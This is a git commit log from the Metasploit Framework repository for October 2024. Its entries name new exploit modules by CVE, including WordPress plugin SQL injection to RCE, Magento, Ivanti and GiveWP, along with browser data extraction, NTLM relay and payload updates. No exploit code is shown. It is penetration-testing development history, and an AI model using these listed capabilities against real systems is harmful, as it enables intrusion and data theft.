2024-10-31 13:46:08 +00:00
Metasploit
04dd01498d
automatic module_metadata_base.json update
2024-10-31 08:43:40 -05:00
adfoster-r7
02f5fd77be
Update build cache to run xargs in parallel
2024-10-31 13:21:45 +00:00
cgranleese-r7
493a52bbcf
Land #19607 , Fix table width bug when running from docker
2024-10-31 13:16:15 +00:00
adfoster-r7
732e2df18a
Fix table width bug when running from docker
2024-10-31 12:44:49 +00:00
adfoster-r7
afbf9af930
Merge pull request #19600 from adfoster-r7/mark-enum-chrome-as-superseded
...
Mark older browser modules for windows as superceded
2024-10-31 11:33:03 +00:00
dwelch-r7
58e69473f8
Land #19603 , Update puma and dependencies
2024-10-31 10:20:45 +00:00
adfoster-r7
825e557269
Update puma and dependencies
2024-10-30 22:41:00 +00:00
h4x-x0r
c34d20db68
updated
...
updated
2024-10-30 21:51:32 +00:00
Brendan
3fa31c8717
Land #19604 , bump payloads to 2.0.187
...
Bump payloads Gem to 2.0.187
2024-10-30 16:37:31 -05:00
bwatters-r7
a2e97b3e38
Update payload cache sizes for... some reason.
2024-10-30 16:19:59 -05:00
bwatters-r7
da21cecf1f
Bump payloads Gem to 2.0.187
2024-10-30 15:45:55 -05:00
jheysel-r7
222df0bfdf
Land #19527 Add bypass for GiveWP RCE (CVE-2024-8353)
...
This updates the exploit module wp_giveup_rce_bypass to incorporate the bypass CVE, allowing the payload to work on all affected versions of the GiveWP plugin.
2024-10-30 16:29:14 -04:00
Jack Heysel
f643aee5a4
Lint
2024-10-30 16:17:36 -04:00
jheysel-r7
9c0dc56aa6
Update modules/exploits/multi/http/wp_givewp_rce.rb
2024-10-30 16:04:28 -04:00
h00die
65efd07935
docs for wp_post_smtp
2024-10-30 15:38:46 -04:00
adfoster-r7
5e217fb93a
Mark enum_chrome as superceded
2024-10-30 16:21:05 +00:00
adfoster-r7
7b745b2dcb
Merge pull request #19506 from xaitax/enum_browsers
...
Add Browser Data Extraction for Chromium- and Gecko-based Browsers
2024-10-30 15:30:56 +00:00
h00die-gr3y
7e30647d71
small update
2024-10-30 15:12:41 +00:00
adfoster-r7
1bee048f85
Merge pull request #19597 from zeroSteiner/fix/bump-payloads/2.0.186
...
Update metasploit-payloads gem to 2.0.186
2024-10-30 15:03:29 +00:00
Metasploit
ffb4659bd0
automatic module_metadata_base.json update
2024-10-30 08:43:24 -05:00
jheysel-r7
d107ac8470
Land #19488 Add aux module for unauth SQLi in Ultimate Member plugin
2024-10-30 09:06:17 -04:00
jheysel-r7
094250f7e7
Land #19489 Add WordPress wp-automatic SQLi to RCE module
2024-10-30 09:05:03 -04:00
h00die
9da5177d11
remove old code
2024-10-29 16:44:48 -04:00
h00die
41ed44864f
wp_post_smtp_acct_takeover
2024-10-29 16:44:20 -04:00
h00die
4feb12ab4a
untested code
2024-10-29 16:44:20 -04:00
jheysel-r7
87af327507
Merge branch 'master' into wp_ultimate_member_sorting_sqli
2024-10-29 16:34:10 -04:00
Spencer McIntyre
778af81c4c
Update metasploit-payloads gem to 2.0.186
...
Includes changes from:
* rapid7/metasploit-payloads#721
* rapid7/metasploit-payloads#729
* rapid7/metasploit-payloads#728
2024-10-29 16:20:25 -04:00
Chocapikk
bcd1fab0b8
Add suggestions
2024-10-29 20:42:13 +01:00
Chocapikk
7ccb2991f6
Improve nonce detection, fix bug
2024-10-29 19:41:47 +01:00
Spencer McIntyre
9f41937c7a
Finish up the exploit module
2024-10-28 17:20:35 -04:00
h00die-gr3y
2c40621d18
added report_web_vuln as suggested by the reviewer
2024-10-28 14:27:05 +00:00
Spencer McIntyre
b2075e5e6b
Merge pull request #19553 from smashery/offered-etype-fix
...
Only retrieve cached credentials that match the requested KrbOfferedEncryptionTypes
2024-10-28 09:47:26 -04:00
Metasploit
1a6cf9dfa7
automatic module_metadata_base.json update
2024-10-25 17:07:35 -05:00
adfoster-r7
6e1ea9297f
Merge pull request #19360 from gardnerapp/osx_daemon_privesc
...
Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb
2024-10-25 22:42:38 +01:00
Spencer McIntyre
6965c2f60a
Merge pull request #19551 from smashery/ldap_session_bugfix
...
Don't require Username and Password for every RHost auth: allows Scha…
2024-10-25 17:12:30 -04:00
h00die-gr3y
6aeb9d130b
added the output option to the documentation
2024-10-25 14:13:18 +00:00
h00die-gr3y
ae176fdfd5
update based on review comments of adfoster-r7
2024-10-25 14:01:10 +00:00
h00die-gr3y
5aaf0b22cd
update based on review comments of adfoster-r7
2024-10-25 10:41:10 +00:00
Spencer McIntyre
27d5c95323
Refactor into an SMB server relay mixin
2024-10-24 16:25:40 -04:00
Spencer McIntyre
9822f3e812
Decouple the NTLM relaying logic
2024-10-24 16:25:40 -04:00
Spencer McIntyre
8ba0019ca0
Refactor the existing relay target client code
2024-10-24 16:25:40 -04:00
bwatters-r7
a18b2b3671
code cleanup and documentation
2024-10-24 15:23:10 -05:00
bwatters
dff4a8ba7c
Updates per Spencer
2024-10-24 15:23:10 -05:00
bwatters
30b0e0ad29
Update debug prints and fix create_csr parameter
2024-10-24 15:23:10 -05:00
bwatters
c4c1aae565
Update smb thread logging, fix control flow, use RELAY_TARGET, other suggestions
2024-10-24 15:23:10 -05:00
bwatters
74f6bc7d13
Remove Rescues and Rubocop
2024-10-24 15:23:10 -05:00
bwatters
6dcf63267b
Fix rescue clauses
2024-10-24 15:23:10 -05:00
bwatters
0b94fdf75f
Fix up suggestions from Spencer et al.
2024-10-24 15:23:10 -05:00
bwatters
1fb0b728a8
Fix timeout, add query_only mode and allow skipping the termplate query
2024-10-24 15:23:10 -05:00
bwatters
4c598c1981
Move ESC8 logic to module and limit debug printing
2024-10-24 15:23:09 -05:00
bwatters
5b1746f73f
Add support for multiple certs
2024-10-24 15:23:09 -05:00
bwatters
0ba3db9466
Working, but ugly
2024-10-24 15:23:09 -05:00
bwatters
af25c94e6a
Change to send_request_raw
2024-10-24 15:23:09 -05:00
bwatters
d94081faf1
Not working; need to checnge to send_request_raw?
2024-10-24 15:23:09 -05:00
bwatters
2c760bd842
Tracking down hash issues
2024-10-24 15:23:09 -05:00
bwatters
7d86c99ba6
Currently getting a bad username/password message
2024-10-24 15:23:09 -05:00
Alex
6fb49a27e0
[Added] Improvements after review
2024-10-24 13:48:50 +02:00
Metasploit
1af43ca110
Bump version of framework to 6.4.34
2024-10-24 06:48:37 -05:00
adfoster-r7
fcd8622cda
Merge pull request #19575 from cgranleese-r7/adds-gem-handling-to-accpetance-tests
...
Builds metasploit-payload gem as part of acceptance tests
2024-10-24 11:48:29 +01:00
adfoster-r7
78a55a32dc
Merge pull request #19585 from adfoster-r7/update-mettle-version
...
Update mettle version
2024-10-24 11:07:41 +01:00
cgranleese-r7
86f9554c3d
Builds metasploit-payload gem as part of acceptance tests
2024-10-24 10:58:48 +01:00
adfoster-r7
92a9163260
Update mettle version
2024-10-24 10:43:49 +01:00
Metasploit
2db574e6c4
automatic module_metadata_base.json update
2024-10-24 04:34:56 -05:00
adfoster-r7
9ac3f57a17
Merge pull request #19536 from GhostlyBox/patch-1
...
Update enum_unattend.rb
2024-10-24 10:10:08 +01:00
cgranleese-r7
eddfda0784
Land #19577 , Fix crash when running meterpreter shell command
2024-10-24 09:54:18 +01:00
adfoster-r7
88825a022c
Remove trailing whitespace
2024-10-23 23:41:20 +01:00
h00die-gr3y
d9f8b66d21
updated documentation with some small tweaks
2024-10-23 17:36:00 +00:00
h00die-gr3y
331a3ad74a
second release module and documentation with some small tweaks
2024-10-23 14:40:00 +00:00
h00die-gr3y
82e0b34670
added documentation
2024-10-23 13:11:14 +00:00
h00die-gr3y
735695e45f
first release module
2024-10-23 12:58:26 +00:00
h00die-gr3y
23e6889839
init commit module
2024-10-23 11:36:32 +00:00
h00die-gr3y
4a1d31f239
small update on the documentation
2024-10-23 10:36:59 +00:00
h00die-gr3y
d6e080a253
first release module + documentation
2024-10-23 10:25:43 +00:00
dwelch-r7
e899f1681f
Merge pull request #19581 from adfoster-r7/add-additional-paths-for-triggering-meterpreter-acceptance
...
Add additional paths for triggering meterpreter acceptance
2024-10-23 10:33:45 +01:00
adfoster-r7
f78559edef
Add additional paths for triggering meterpreter acceptance
2024-10-23 10:17:40 +01:00
dwelch-r7
b2e8a50fdc
Land #19580 , Add gitleaksignore file
2024-10-23 10:16:11 +01:00
adfoster-r7
8c9f670b81
Merge pull request #19576 from adfoster-r7/fix-crash-when-importing-metasploit-xml-file
...
Fix crash when importing Metasploit xml file
2024-10-23 10:14:01 +01:00
adfoster-r7
46271c6721
Add gitleaksignore file
2024-10-23 10:00:17 +01:00
h00die-gr3y
abf81619d4
init commit module
2024-10-23 08:45:32 +00:00
adfoster-r7
fdfda1f7e3
Fix crash when running meterpreter shell command
2024-10-23 00:35:47 +01:00
adfoster-r7
d7c8836f3b
Fix crash when importing Metasploit xml file
2024-10-22 23:47:44 +01:00
Metasploit
b03d666d18
automatic module_metadata_base.json update
2024-10-22 14:24:00 -05:00
Spencer McIntyre
05a149dadc
Merge pull request #19572 from cdelafuente-r7/fix/mod/ldap/ad_cs_cert_template
...
Fix UPDATE certificate templates with `admin/ldap/ad_cs_cert_template`
2024-10-22 15:03:31 -04:00
Christophe De La Fuente
ae213813b5
Updates from code review
2024-10-22 14:41:02 +02:00
h4x-x0r
661075a45c
handling additional case
...
handling additional case when autocheck is disabled and no credentials are provided
2024-10-22 03:42:39 +01:00
h4x-x0r
4d7d7f2c06
updated
...
using instance variables instead of updating the datastores
2024-10-21 22:07:43 +01:00
h4x-x0r
7028b807ed
linting
...
linting
2024-10-21 21:45:04 +01:00
h4x-x0r
b6d3a0ef36
safety flag
...
added a safety flag for the password reset in case no credentials are provided
2024-10-21 21:43:48 +01:00
h4x-x0r
d950bf7bb3
updated
...
updated
2024-10-21 20:51:41 +01:00
Alex
1fa9c6a774
[Fixed] Opera Support
2024-10-21 17:03:37 +02:00
adfoster-r7
9c0efc67fb
Merge pull request #19567 from bcoles/wordlists
...
data/wordlists: Add default passwords for common single-board computers
2024-10-21 11:58:23 +01:00
Alex
e6aa695e99
Update enum_browsers.rb
2024-10-21 09:48:24 +02:00
Alex
87b2cb7f5a
Fix Readme
2024-10-20 23:19:17 +02:00
Alex
ecd9f99d16
[Added] Extract Browser Cache
2024-10-20 23:15:18 +02:00
Alex
a2d8d7dd76
[Added] Extract Installed Browser Extensions (Name & Version)
2024-10-20 21:23:06 +02:00
h4x-x0r
202e5e55ac
Added exception handling
...
Added exception handling
2024-10-20 19:50:43 +01:00
Jack Heysel
cf85992531
Placeholder commit
2024-10-18 16:11:06 -07:00
adfoster-r7
27fa707095
Merge pull request #19571 from sjanusz-r7/fix-readline-unresponsive-on-windows-11
...
Monkey-patch Readline to fix unresponsiveness on Windows 11
2024-10-18 18:59:53 +01:00
sjanusz-r7
7dc918f122
Don't monkey patch RbReadline multiple times
2024-10-18 18:51:40 +01:00
adfoster-r7
b60a70b970
Merge pull request #19570 from cgranleese-r7/fix-reusable-pipeline-report-generation
...
Fixes reusable pipeline allure report generation
2024-10-18 18:30:08 +01:00
Christophe De La Fuente
43f13c7e90
Add the msPKI-Template-Schema-Version attribute to ESC1, ESC2 and ESC3 templates
2024-10-18 18:57:50 +02:00
adfoster-r7
501713fb2b
Update .github/workflows/shared_meterpreter_acceptance.yml
2024-10-18 17:47:33 +01:00
adfoster-r7
bb26b733d0
Apply suggestions from code review
2024-10-18 17:46:36 +01:00
sjanusz-r7
02dd5ac604
Monkey-patch Readline to fix unresponsiveness on Windows 11
2024-10-18 17:46:25 +01:00
cgranleese-r7
3da061e670
Fixes resuable pipeline report generation
2024-10-18 17:05:01 +01:00
adfoster-r7
e96d9b2be2
Merge pull request #19568 from cgranleese-r7/adds-smb-acceptance-testing-reusable-pipeline
...
Adds SMB reusable pipeline for acceptance testing
2024-10-18 16:22:49 +01:00
cgranleese-r7
a753dc1799
Adds SMB reusable pipeline for acceptance testing
2024-10-18 15:51:13 +01:00
bcoles
e50767bb6f
data/wordlists: Add default passwords for common single-board computers
2024-10-19 00:49:14 +11:00
adfoster-r7
afa7fd7cdd
Merge pull request #19564 from cgranleese-r7/adds-acceptance-testing-reusable-pipeline
...
Adds a resuable pipeline for acceptance testing
2024-10-18 14:20:56 +01:00
Metasploit
11531af2b9
automatic module_metadata_base.json update
2024-10-18 08:02:37 -05:00
cgranleese-r7
d614d594ea
Label and input logic adjustments
2024-10-18 13:54:10 +01:00
Diego Ledda
59d026acd3
Land #19544 , Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow iconv() of GLIBC (CVE-2024-2961)
2024-10-18 14:39:54 +02:00
cgranleese-r7
6aea17380f
Adds a resuable pipeline for acceptance testing
2024-10-18 11:21:05 +01:00
Metasploit
4422322cd0
Bump version of framework to 6.4.33
2024-10-17 12:37:56 -05:00
Metasploit
a6ba890a33
automatic module_metadata_base.json update
2024-10-17 12:17:01 -05:00
Spencer McIntyre
77f63442d7
Add the initial higher level client
2024-10-17 12:54:25 -04:00
Spencer McIntyre
619620733d
Add the initial Ivanti Agent Portal RCE
2024-10-17 12:54:25 -04:00
Spencer McIntyre
4dbcde793b
Add the definitions for MS-NRTP messages
2024-10-17 12:54:25 -04:00
Spencer McIntyre
39698ec1ed
Add the BinaryArray record definition
2024-10-17 12:54:25 -04:00
Spencer McIntyre
574654888b
Add the BinaryMethodCall record definition
2024-10-17 12:54:25 -04:00
Spencer McIntyre
1c84d5719f
Add a basic MethodReturn definition
2024-10-17 12:54:25 -04:00
Christophe De La Fuente
f636a9e466
Land #19538 , Add Support for ESC15
2024-10-17 18:08:14 +02:00
Spencer McIntyre
98f9112437
Report ESC vulns found in LDAP
2024-10-17 11:24:23 -04:00
Spencer McIntyre
6ca0bb74fd
Add workflow docs
2024-10-17 11:23:31 -04:00
Spencer McIntyre
2e4315b3c9
Add support to icpr_cert for ESC15
2024-10-17 11:23:31 -04:00
Spencer McIntyre
8d943efc30
Add the ldapwhoami command support
...
See RFC4532 and ruby-ldap/ruby-net-ldap#425
2024-10-17 11:23:31 -04:00
Spencer McIntyre
94535bbfab
Add support for finding ESC15
2024-10-17 11:23:31 -04:00
Spencer McIntyre
8e38010d6e
Add an ESC15 template
2024-10-17 11:23:31 -04:00
Spencer McIntyre
fd1f14e5ab
Add the x509 definitions for ESC15
2024-10-17 11:23:31 -04:00
Metasploit
76d3980c44
Bump version of framework to 6.4.32
2024-10-17 04:54:21 -05:00
cgranleese-r7
3bd875c4e6
Land #19563 , Update metabase setuptoken rce to support older versions
2024-10-17 10:42:26 +01:00
Metasploit
70eed21c2d
automatic module_metadata_base.json update
2024-10-17 04:30:26 -05:00
Diego Ledda
e85ee0271d
Land #19482 , LearnPress SQLi module (CVE-2024-8522, CVE-2024-8529)
2024-10-17 11:13:49 +02:00
adfoster-r7
7b400f18fe
Fix metabase rce to support older versions
2024-10-17 10:10:50 +01:00
Metasploit
49b0644104
automatic module_metadata_base.json update
2024-10-16 18:32:46 -05:00
adfoster-r7
26e041dbfe
Merge pull request #19108 from smashery/new_cmd_exec
...
New process launch API
2024-10-17 00:08:06 +01:00
adfoster-r7
b281d46c2d
Merge pull request #19495 from cdelafuente-r7/fix/pkinit/san_extension
...
Fix crash in `Kerberos::Client::Pkinit#extract_user_and_realm` with specific SAN extension
2024-10-16 23:10:38 +01:00
Metasploit
5827355c87
automatic module_metadata_base.json update
2024-10-16 16:27:59 -05:00
adfoster-r7
f74b3eaf32
Merge pull request #19561 from cdelafuente-r7/enh/ldap_esc_vulnerable_cert_finder/report_vuln
...
Add vulnerability report capability to the `ldap_esc_vulnerable_cert_finder` module
2024-10-16 22:12:34 +01:00
Ashley Donaldson
94d72b2b8b
Update metasploit-payloads gem to 2.0.183
2024-10-17 07:01:00 +11:00
Christophe De La Fuente
b9509dc882
Report vulns in ldap_esc_vulnerable_cert_finder
2024-10-16 21:23:21 +02:00
Ashley Donaldson
197595659e
Better timeout for PHP 5.3 tests, which apparently take forever
2024-10-16 16:53:53 +11:00
Ashley Donaldson
9972587fef
Handle weird PowerShell edge case
2024-10-16 16:04:39 +11:00
Ashley Donaldson
205adfe2fd
Handle edge case in command shell when input contains backslash-quote combination already
2024-10-16 10:26:29 +11:00
Jack Heysel
59e18d5158
Updates to Gemfile.lock
2024-10-15 10:54:40 -07:00
Jack Heysel
ee68e47521
Added http_server cleanup
2024-10-15 10:28:39 -07:00
Jack Heysel
7a89db5080
Updated print statements
2024-10-15 09:21:07 -07:00
Jack Heysel
3635dd1c23
Merge branch 'magento_xxe_to_rce'
2024-10-15 09:17:40 -07:00
Jack Heysel
3f6f060933
Updated check method
2024-10-15 09:17:02 -07:00
Metasploit
26d8d23596
automatic module_metadata_base.json update
2024-10-15 10:35:55 -05:00
Diego Ledda
9a245e6e06
Land #19485 , Module BYOB Unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)
...
Land #19485 , Module BYOB Unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)
2024-10-15 17:13:15 +02:00
Ashley Donaldson
bdfa1f3a3f
Update metasploit-payloads gem to 2.0.180
2024-10-15 23:43:17 +11:00
bcoles
8ba1034105
Add tests for Linux Execute Command 32-bit/64-bit RISC-V LE payloads
2024-10-15 22:51:36 +11:00
bcoles
27ebde9ad5
Add Linux Execute Command 32-bit/64-bit RISC-V LE payloads
2024-10-15 22:51:36 +11:00
bcoles
5e1ecfc0c0
Add tests for Linux Reboot 32-bit/64-bit RISC-V LE payloads
2024-10-15 22:51:36 +11:00
bcoles
befabb8887
Add 32-bit/64-bit RISC-V LE NOP sled modules
2024-10-15 22:51:36 +11:00
bcoles
92cf931d6e
Add Linux Reboot 32-bit/64-bit RISC-V LE payloads
2024-10-15 22:51:36 +11:00
bcoles
f244d07bd0
Msf::Util::EXE: Add support for RISC-V ELF executables
2024-10-15 22:51:36 +11:00
bcoles
1c748d376a
Add RISC-V 32-bit/64-bit ELF templates
2024-10-15 22:51:32 +11:00
Metasploit
d32b771caa
automatic module_metadata_base.json update
2024-10-15 06:35:45 -05:00
Diego Ledda
236639f584
Land #19473 , Module for unauthenticated SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)
...
Land #19473 , Module for unauthenticated SQL Injection Vulnerability in WP Fastest Cache (CVE-2023-6063)
2024-10-15 13:10:59 +02:00
Metasploit
23484e0172
automatic module_metadata_base.json update
2024-10-15 05:57:47 -05:00
dwelch-r7
9cb3fefb40
Land #19539 , Keep LDAP sessions alive
2024-10-15 11:28:08 +01:00
Ashley Donaldson
7890595dd9
Add one more annoying test case
2024-10-15 21:21:01 +11:00
h4x-x0r
7929df2bfd
improved reliability
...
improved reliability
2024-10-15 06:26:46 +01:00
Chocapikk
a79fd2a1c7
Add right payload for CVE-2024-8529
2024-10-14 18:15:02 +02:00
Chocapikk
193712c7e4
Update
2024-10-14 18:15:02 +02:00
Chocapikk
cfe22d4788
Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi
2024-10-14 18:15:02 +02:00
Chocapikk
145a23625d
Add LearnPress SQLi module (CVE-2024-8522, CVE-2024-8529)
2024-10-14 18:15:01 +02:00
Valentin Lobstein
f0f0ee88cf
Update modules/auxiliary/scanner/http/wp_ultimate_member_sorting_sqli.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-10-14 18:14:11 +02:00
Chocapikk
bb651667dd
Update
2024-10-14 18:14:11 +02:00
Chocapikk
13497a5a33
Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi
2024-10-14 18:14:11 +02:00
Chocapikk
1525a61a19
Use negative number
2024-10-14 18:14:10 +02:00
Chocapikk
0fd76f32a0
Remove comments
2024-10-14 18:14:10 +02:00
Chocapikk
668424a444
Add unauth SQLi exploit module for Ultimate Member plugin (CVE-2024-1071)
2024-10-14 18:14:10 +02:00
Valentin Lobstein
0686cdbb82
Update modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-10-14 18:13:19 +02:00
Valentin Lobstein
fdb450955e
Update modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-10-14 18:13:19 +02:00
Chocapikk
611a16d368
Update
2024-10-14 18:13:18 +02:00
Chocapikk
465ae37ad2
Use wordpress_sqli_initialize instead
2024-10-14 18:13:18 +02:00
Chocapikk
a9f7fb3ace
Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi
2024-10-14 18:13:18 +02:00
Chocapikk
6c099f2b73
Add WordPress wp-automatic SQLi to RCE module (CVE-2024-27956)
2024-10-14 18:13:17 +02:00
Chocapikk
4807b6f3a9
Add banner
2024-10-14 18:11:42 +02:00
Chocapikk
95e64a0a3b
Add module for TI WooCommerce Wishlist SQL Injection (CVE-2024-43917)
2024-10-14 18:11:41 +02:00
Chocapikk
36162ab8bb
Fix exploitation bug
2024-10-14 18:03:50 +02:00
Chocapikk
a87e915028
Update
2024-10-14 18:03:50 +02:00
Chocapikk
37eeeadba6
Use Msf::Exploit::Remote::HTTP::Wordpress::SQLi
2024-10-14 18:03:49 +02:00
Valentin Lobstein
a687a6c3c8
Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
2024-10-14 18:03:49 +02:00
Chocapikk
63c3a12bf4
Restore 'tcp' instead of 'http' because 'ActiveRecord::RecordInvalid Validation failed: Proto is not included in the list'
2024-10-14 18:03:49 +02:00
Chocapikk
272c09d2b7
fix typo
2024-10-14 18:03:48 +02:00
Chocapikk
b99f0e6e30
Re-add import (to use target_uri)
2024-10-14 18:03:48 +02:00
Valentin Lobstein
41b513cec5
Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
2024-10-14 18:03:48 +02:00
Valentin Lobstein
121dc19ea9
Update modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-14 18:03:47 +02:00
Chocapikk
def55173e1
Randomize values + remove useless mixin import
2024-10-14 18:03:47 +02:00
Chocapikk
8553f625a4
Add auxiliary/scanner/http/wp_fastest_cache_sqli
2024-10-14 18:03:46 +02:00
h4x-x0r
5716b6c799
linting
...
linting
2024-10-14 15:56:00 +01:00
h4x-x0r
ea74802a5a
cleanup
...
cleanup
2024-10-14 15:53:07 +01:00
h4x-x0r
bd7cd8b3ba
cleanup
...
cleanup
2024-10-14 15:36:45 +01:00
Diego Ledda
d2b4175f49
Land #19497 , add Wordpress SQLi Mixin
...
Land #19497 , add Wordpress SQLi Mixin
2024-10-14 13:13:52 +02:00
Chocapikk
f881a0e592
Remove useless verbosity
2024-10-14 11:46:53 +02:00
Ashley Donaldson
9b4cd2241d
Update payload sizes
2024-10-14 15:43:40 +11:00
Ashley Donaldson
1b169efe3d
Update payload dependencies
2024-10-14 15:27:15 +11:00
h4x-x0r
34538df83c
PoC and Documentation
...
PoC and Documentation
2024-10-14 05:09:29 +01:00
Graeme Robinson
5228acb0f1
Update werkzeug_debug_rce docs to show modified output
2024-10-13 23:11:52 +01:00
Graeme Robinson
f369a80fcc
Satisfy msftidy_docs against werkzeug_debug_rce.md
2024-10-13 22:55:12 +01:00
Graeme Robinson
3a79c6d70f
rubocop -a on werkzeug_debug_rce.rb
2024-10-13 22:36:35 +01:00
NtAlexio2
6983ec5e12
fix lintings in pipe_dcerpc_auditor
2024-10-13 13:38:05 -04:00
Graeme Robinson
f17fc282bc
Made suggested changes to werkzeug_debug_rce.rb
2024-10-13 00:19:50 +01:00
Ashley Donaldson
1c4b22028d
Comment neatening from code review
2024-10-12 14:36:09 +11:00
Ashley Donaldson
6450a8f916
Support backwards compatibility for Python
2024-10-12 14:36:09 +11:00
Ashley Donaldson
0cf227ff00
Change API. Support backwards compatibility for PHP
2024-10-12 14:36:09 +11:00
Ashley Donaldson
6d12d506dd
Run the Python tests (fixed in payloads repo)
2024-10-12 14:36:09 +11:00
Ashley Donaldson
ac50cede6f
Remove unused line
2024-10-12 14:36:09 +11:00
Ashley Donaldson
27e3376fba
Allow longer acceptance tests - needed for PHP 5.3
2024-10-12 14:36:09 +11:00
Ashley Donaldson
b4da4e74af
Use specific subclass of Command Shell for reverse bash
2024-10-12 14:36:09 +11:00
Ashley Donaldson
c543971b8a
Support uploading files on linux shell containing quote characters
2024-10-12 14:36:09 +11:00
Ashley Donaldson
a32a302f09
Fix issue with windows command shells
2024-10-12 14:36:09 +11:00
Ashley Donaldson
2a8924ead3
Fix shell file upload when filename has interesting characters
2024-10-12 14:36:09 +11:00
Ashley Donaldson
75157f8759
Fix test case for java on Windows
2024-10-12 14:36:09 +11:00
Ashley Donaldson
7a5471a673
Fix bug in chmod for Java meterp
2024-10-12 14:36:09 +11:00
Ashley Donaldson
6fc714c954
Take stderr tests back out for now
2024-10-12 14:36:09 +11:00
Ashley Donaldson
ec4e944405
Fix file upload in PowerShell
2024-10-12 14:36:09 +11:00
Ashley Donaldson
602506bdb9
Updated for PHP and Python
2024-10-12 14:36:08 +11:00
Ashley Donaldson
593d06e1f5
Tests working on Windows 10 meterp
2024-10-12 14:36:08 +11:00
Ashley Donaldson
a69b777a9e
Included tests for create_process API
2024-10-12 14:36:08 +11:00
Ashley Donaldson
880203b503
Remove accidentally committed changes
2024-10-12 14:36:08 +11:00
Ashley Donaldson
0ab16ae3af
Fix bug when no arguments are present
2024-10-12 14:36:08 +11:00
Ashley Donaldson
d9ed8ec4dc
Rework unix command line based on testing
2024-10-12 14:36:08 +11:00
Ashley Donaldson
5d71aa26e3
Treat old-style path separately to new (unescaped) path
2024-10-12 14:36:08 +11:00
Ashley Donaldson
7d30c67b01
Fix error sending legacy args
2024-10-12 14:36:08 +11:00
Ashley Donaldson
fe61e46475
Changes from code review
2024-10-12 14:36:08 +11:00
Ashley Donaldson
658c9fcc32
Comment function
2024-10-12 14:36:08 +11:00
Ashley Donaldson
85d019cd3c
Handle CommandLineToArgv behaviour
2024-10-12 14:36:08 +11:00
Ashley Donaldson
0d4d6f345d
create_process works for basic CommandShell instances
2024-10-12 14:36:08 +11:00
Ashley Donaldson
e9f86c4865
Reworked unix create_process, as it was buggy
2024-10-12 14:36:08 +11:00
Ashley Donaldson
e0aca71029
Add unix shell to create_process API
2024-10-12 14:36:08 +11:00
Ashley Donaldson
72e657a19c
Implement new cmd_exec API for Windows cmd
2024-10-12 14:36:08 +11:00
Ashley Donaldson
955c675334
Implement new cmd_exec API for PowerShell
2024-10-12 14:36:08 +11:00
h4x-x0r
d28a098398
CVE-2024-9464
...
CVE-2024-9464
2024-10-11 19:31:56 +01:00
Ashley Donaldson
a854689424
Added new failing test for windows junction points
2024-10-11 21:17:51 +11:00
Alex
6d272759dc
Add Browser Version Detection and display System Information
2024-10-11 12:13:48 +02:00
Ashley Donaldson
617270265d
Only retrieve cached credentials that match the requested OfferedEncryptionTypes
2024-10-11 16:23:26 +11:00
adfoster-r7
cb10062cb2
Merge pull request #19540 from smashery/ua_strings_oct24
...
Update User Agent strings for October 2024
2024-10-11 01:15:12 +01:00
Ashley Donaldson
395e74359e
Update User Agent strings for October 2024. Add script to automate this in future.
2024-10-11 09:31:07 +11:00
Ashley Donaldson
fa2b7e54a6
Fix unit tests
2024-10-11 08:22:40 +11:00
Ashley Donaldson
c732fed617
Feedback from code review
2024-10-11 08:22:39 +11:00
Ashley Donaldson
22cf3f05d5
Send a benign LDAP request every 10 minutes to keep sessions alive
2024-10-11 08:22:39 +11:00
Ashley Donaldson
9cb4cce9b4
Don't require Username and Password for every RHost auth: allows Schannel cert and Kerberos cached ticket auth
2024-10-11 08:00:20 +11:00
adfoster-r7
00b1d8fec6
Merge pull request #19549 from zeroSteiner/fix/bump-payloads/2.0.175
...
Update metasploit-payloads gem to 2.0.175
2024-10-10 20:54:16 +01:00
jheysel-r7
3be4eae2f5
Update modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-10-10 15:20:06 -04:00
Mathieu
8c5bead4a0
Added spec to reproduce the username/password generation error in case PASSWORD_SPRAY and USER_AS_PASS are both enabled
...
Added minimal code to fix the issue, extracting the code to generate username:username credentials in the PASSWORD_SPRAY case
2024-10-10 21:15:50 +02:00
Jack Heysel
44b33b8010
Fixed multiple sessions and instability
2024-10-10 11:36:16 -07:00
Spencer McIntyre
0309f51314
Update metasploit-payloads gem to 2.0.175
...
Includes changes from:
* rapid7/metasploit-payloads#719
* rapid7/metasploit-payloads#718
* rapid7/metasploit-payloads#715
* rapid7/metasploit-payloads#713
* rapid7/metasploit-payloads#712
* rapid7/metasploit-payloads#709
* rapid7/metasploit-payloads#708
* rapid7/metasploit-payloads#705
* rapid7/metasploit-payloads#704
* rapid7/metasploit-payloads#703
2024-10-10 14:18:11 -04:00
Alex
91beef1dbb
Add BROWSER_TYPE option to choose between Chromium, Gecko, or both for data extraction
2024-10-10 20:08:14 +02:00
Alex
47c4679d6b
Fixed migration logic
2024-10-10 19:28:03 +02:00
dwelch-r7
81146170c8
Land #19548 , Update php actions plugin version
2024-10-10 16:15:04 +01:00
adfoster-r7
dfa9a548b5
Update php actions plugin version
2024-10-10 15:50:03 +01:00
Alex
d3ae5a9ab0
Abort when session is running under SYSTEM privileges.
2024-10-10 13:25:11 +02:00
Alex
cd487715c4
[Added] Migration to explorer.exe for user-context based extraction
2024-10-10 12:32:19 +02:00
adfoster-r7
93e0ca7cd5
Improve database module cache performance
2024-10-10 10:52:19 +01:00
Metasploit
93344df7e1
Bump version of framework to 6.4.31
2024-10-10 04:23:08 -05:00
Jack Heysel
65936d181e
Update libc region on sucess print
2024-10-09 23:04:44 -07:00
Jack Heysel
dab5d66e37
